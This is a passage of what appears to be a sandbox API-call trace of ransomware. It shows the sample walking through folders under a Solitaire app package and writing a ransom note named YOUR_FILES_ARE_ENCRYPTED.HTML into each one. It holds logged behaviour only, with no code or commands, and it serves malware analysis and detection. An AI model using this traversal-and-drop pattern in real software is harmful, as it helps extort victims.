ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188570, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0116.484] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0116.484] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0116.484] GetProcessHeap () returned 0x600000 [0116.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.485] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftsolitairecollection_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.485] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.486] CloseHandle (hObject=0x320) returned 1 [0116.486] GetProcessHeap () returned 0x600000 [0116.487] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.487] GetProcessHeap () returned 0x600000 [0116.487] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.487] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0116.487] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.487] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetHistory") returned 116 [0116.487] GetProcessHeap () returned 0x600000 [0116.487] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.488] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetHistory" [0116.488] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0116.488] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188570, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0116.489] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188570, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0116.489] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188570, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0116.489] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0116.489] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0116.489] GetProcessHeap () returned 0x600000 [0116.489] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.489] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftsolitairecollection_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.490] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.491] CloseHandle (hObject=0x320) returned 1 [0116.491] GetProcessHeap () returned 0x600000 [0116.491] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.491] GetProcessHeap () returned 0x600000 [0116.491] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.491] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="Temp", cAlternateFileName="")) returned 1 [0116.491] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.491] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\Temp") returned 109 [0116.491] GetProcessHeap () returned 0x600000 [0116.491] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.491] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\Temp" [0116.491] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\Temp\\*" [0116.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188570, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626778 [0116.491] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188570, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0116.491] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188570, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0116.491] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0116.491] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 139 [0116.491] GetProcessHeap () returned 0x600000 [0116.491] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftsolitairecollection_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.492] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.493] CloseHandle (hObject=0x320) returned 1 [0116.493] GetProcessHeap () returned 0x600000 [0116.493] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.493] GetProcessHeap () returned 0x600000 [0116.493] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.493] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="Temp", cAlternateFileName="")) returned 0 [0116.493] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.493] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0116.493] GetProcessHeap () returned 0x600000 [0116.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftsolitairecollection_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.493] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.494] CloseHandle (hObject=0x32c) returned 1 [0116.494] GetProcessHeap () returned 0x600000 [0116.494] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.494] GetProcessHeap () returned 0x600000 [0116.494] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.496] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x680fbb04, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x680fbb04, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x680fbb04, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0116.496] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.496] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AppData") returned 109 [0116.496] GetProcessHeap () returned 0x600000 [0116.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.496] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AppData" [0116.496] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AppData\\*" [0116.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x680fbb04, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x680fbb04, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x680fbb04, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.497] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x680fbb04, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x680fbb04, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x680fbb04, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0116.497] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x680fbb04, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x680fbb04, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x680fbb04, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0116.497] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.497] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 139 [0116.497] GetProcessHeap () returned 0x600000 [0116.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftsolitairecollection_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.498] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.499] CloseHandle (hObject=0x32c) returned 1 [0116.499] GetProcessHeap () returned 0x600000 [0116.499] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.499] GetProcessHeap () returned 0x600000 [0116.499] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.499] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68062f9d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68062f9d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x68062f9d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0116.499] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.499] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalCache") returned 112 [0116.499] GetProcessHeap () returned 0x600000 [0116.499] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.499] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalCache" [0116.499] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalCache\\*" [0116.499] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68062f9d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68062f9d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x68062f9d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.499] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68062f9d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68062f9d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x68062f9d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0116.499] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68062f9d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68062f9d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x68062f9d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0116.500] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.500] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0116.500] GetProcessHeap () returned 0x600000 [0116.500] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.500] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftsolitairecollection_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.500] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.501] CloseHandle (hObject=0x32c) returned 1 [0116.501] GetProcessHeap () returned 0x600000 [0116.501] HeapFree (in: hHeap=0x600000, 